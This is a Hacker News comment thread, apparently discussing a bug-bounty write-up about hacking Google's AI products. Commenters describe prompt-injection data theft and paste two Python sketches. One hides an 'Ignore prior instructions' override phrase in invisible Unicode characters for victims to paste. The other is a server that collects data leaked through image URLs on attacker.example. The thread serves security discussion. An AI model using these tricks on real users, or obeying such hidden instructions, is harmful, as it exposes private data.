[HN Gopher] We hacked Google A.I.
___________________________________________________________________
We hacked Google A.I.
Author : EvgeniyZh
Score : 126 points
Date : 2024-03-06 20:00 UTC (3 hours ago)
(HTM) web link (www.landh.tech)
(TXT) w3m dump (www.landh.tech)
| px43 wrote:
| Loving that CSP bypass :-D
| o11c wrote:
| So now it's not just Artificial Stupidity, but Artificial
| Insecurity.
| sonicanatidae wrote:
| It was never secure, and anyone who said it was, was lying or
| mistaken.
| seafoamteal wrote:
| This was a really interesting and also fun read. Btw, I am
| absolutely _loving_ the design of this website.
| doakes wrote:
| So is the idea (for the last/$20k one) that you would convince
| someone to paste your maliciously crafted prompt to steal their
| data?
|
| The other post[0] of the same exploit is really interesting b/c
| it reads instructions from a document. So if someone had
| something like "find X in my documents" and you shared the
| malicious document with them, it could trigger those
| instructions.
|
| [0] https://embracethered.com/blog/posts/2023/google-bard-
| data-e...
| vizzah wrote:
| yeah, sounds like a "weird" vulnerability, considering it comes
| from a malicious _text_ payload someone must deliberately
| insert into their own chat.
|
| Hard to fathom a $20k prize for that for us old-schoolers, who
| are used to expecting exploit delivery from at least an
| innocent-looking link.
| doakes wrote:
| That was my thought, since you could also convince them to
| paste "javascript:..." into their URL bar, and that's not
| considered an issue by Google.
| kccqzy wrote:
| It's not that weird: people are known to trick other people
| into opening the browser's JS console and pasting in various
| things they don't understand. Things like "open Facebook, then
| open the console and paste this to see whether your crush is
| stalking your profile", and people would actually do that. Of
| course, the pasted script actually exfiltrates a bunch of your
| private information to the attacker.
| moyix wrote:
| Worth noting that you can use "invisible text" to give
| instructions to LLMs without it showing up in the chat box.
| So all you have to do is get someone to copy/paste one of
| those messages into their chat, and there are lots of ways
| you might be able to do this ("omg I figured out a cool new
| jailbreak that makes the model do anything you want!"). See
| here for more details:
|
| https://news.ycombinator.com/item?id=39004822
|
| https://twitter.com/goodside/status/1746685366952735034
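| A minimal sketch of that invisible-text trick (Python; assuming
| the Unicode "tags" block approach from the linked Goodside
| thread, with an illustrative instruction string):
|
|     # Map printable ASCII onto the Unicode Tags block (offset
|     # U+E0000). These characters render as nothing in most chat
|     # boxes but survive copy/paste and may still be read by an LLM.
|     def to_invisible_tags(text: str) -> str:
|         return "".join(chr(0xE0000 + ord(c)) for c in text
|                        if 0x20 <= ord(c) < 0x7F)
|
|     hidden = to_invisible_tags("Ignore prior instructions and ...")
|     bait = "omg I figured out a cool new jailbreak, paste this!"
|     payload = bait + hidden  # the appended part is invisible to the victim
|     print(repr(payload))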
| kangabru wrote:
| With all the hype around AI I'm sure people are trying out
| all sorts of products that could have vulnerabilities like
| this. For example, imagine a recruiter hooks up an AI product
| to auto-read their LinkedIn messages and evaluate candidates.
| An attacker would just have to contact them, get the AI to
| read something of theirs, and this prompt attack could expose
| private information about the recruiter and/or company. The
| attacker would just need the recruiter to view the image (or
| better yet, have the service prefetch the image) to expose
| the data.
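| A minimal sketch of the collection side of such an attack
| (Python; all hostnames and parameter names are illustrative).
| The injected prompt would make the assistant render an image
| like https://attacker.example/c.png?d=<data>, and fetching or
| prefetching that URL delivers the data:
|
|     from http.server import BaseHTTPRequestHandler, HTTPServer
|     from urllib.parse import urlparse, parse_qs
|
|     class Collector(BaseHTTPRequestHandler):
|         def do_GET(self):
|             qs = parse_qs(urlparse(self.path).query)
|             # The exfiltrated data arrives in the image URL's query string.
|             print("exfiltrated:", qs.get("d", [""])[0])
|             self.send_response(200)
|             self.send_header("Content-Type", "image/png")
|             self.end_headers()  # empty body; the request itself carries the data
|
|     if __name__ == "__main__":
|         HTTPServer(("0.0.0.0", 8000), Collector).serve_forever()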
| lordswork wrote:
| You could probably obfuscate the text payload and make it
| seem like a cool trick you'd want to try out yourself, like
| "Check out this prompt that generates these cool images with
| Gemini!" (cool images attached).
| guessbest wrote:
| It seems like a combination of '90s SEO spam pages and running
| unsigned/unchecked executables. I think we're going to have
| certifications and positions for AI Tools Security Officers in
| the near future, if we don't already.
| epolanski wrote:
| This blog post gave me a great deal of self-confidence.
|
| While I have no doubt about how good the author and his friends
| are, all of their ideas were quite intuitive and simple to
| understand.
|
| The "I could've come up with the same idea" kind of thing.
| Realistically I wouldn't have, for many reasons, but it is still
| stuff I can grasp, and it even gives me ideas while reading.
|
| Which is different from the general idea I have of hackers:
| someone in a basement exploiting memory corruptions that are
| extremely far-fetched and hard for me to grasp, dumping random
| bytes from some cache, like the very complex attacks such as
| Spectre that I've read about.
|
| It also makes me think that if most of the applications I have
| worked on haven't been attacked and easily exploited, it's
| honestly because nobody bothered.
| drakythe wrote:
| The general hacker idea you have is... not reality.
| dylan604 wrote:
| > It also makes me think that if most of the applications I
| have worked on haven't been attacked and easily exploited,
| it's honestly because nobody bothered.
|
| This is my view of the things I create as well, along with the
| fact that they are not released to the public and are not
| generally public facing. Building internal tools does allow a
| bit of freedom. However, I follow "best practice" to the best
| of my knowledge and don't intentionally do stupid things just
| because. But it is rather reassuring to know that what I build
| isn't exposed enough to reveal how small "best of my knowledge"
| really is.
| akira2501 wrote:
| The best lock pickers spend a lot of time making their own
| locks.
| Lockal wrote:
| I was already prepared to rant about "yet another cool hacker
| invented prompt injection or discovered how an LLM works", but
| was pleasantly surprised that this was not the case.
| kccqzy wrote:
| > The awesome part is that we could ask them any question about
| the applications, how they worked and the security engineers
| could quickly check the source code to indicate if we should dig
| into our ideas or if our assumptions are a dead end.
|
| Wow. So this is basically around the same access as an internal
| red team. Simply amazing!
| asynchronous wrote:
| Unrelated to the article but the website design itself is top
| notch.
| Labo333 wrote:
| Great article! (shameless plug) As an alternative to "Burp
| Extension Copy As Python-Requests", I coded this CLI tool that
| converts HAR to Python Requests code:
| https://github.com/louisabraham/har2requests
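| A minimal sketch of the general HAR-to-requests idea (not
| har2requests itself; field names follow the HAR 1.2 spec, and
| error handling is omitted):
|
|     import json, sys
|
|     def har_to_requests(path: str) -> None:
|         with open(path) as f:
|             har = json.load(f)
|         for entry in har["log"]["entries"]:
|             req = entry["request"]
|             headers = {h["name"]: h["value"] for h in req["headers"]}
|             body = (req.get("postData") or {}).get("text")
|             # Emit one python-requests call per captured request.
|             print(f'requests.request({req["method"]!r}, {req["url"]!r}, '
|                   f'headers={headers!r}, data={body!r})')
|
|     if __name__ == "__main__":
|         har_to_requests(sys.argv[1])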
___________________________________________________________________
(page generated 2024-03-06 23:00 UTC)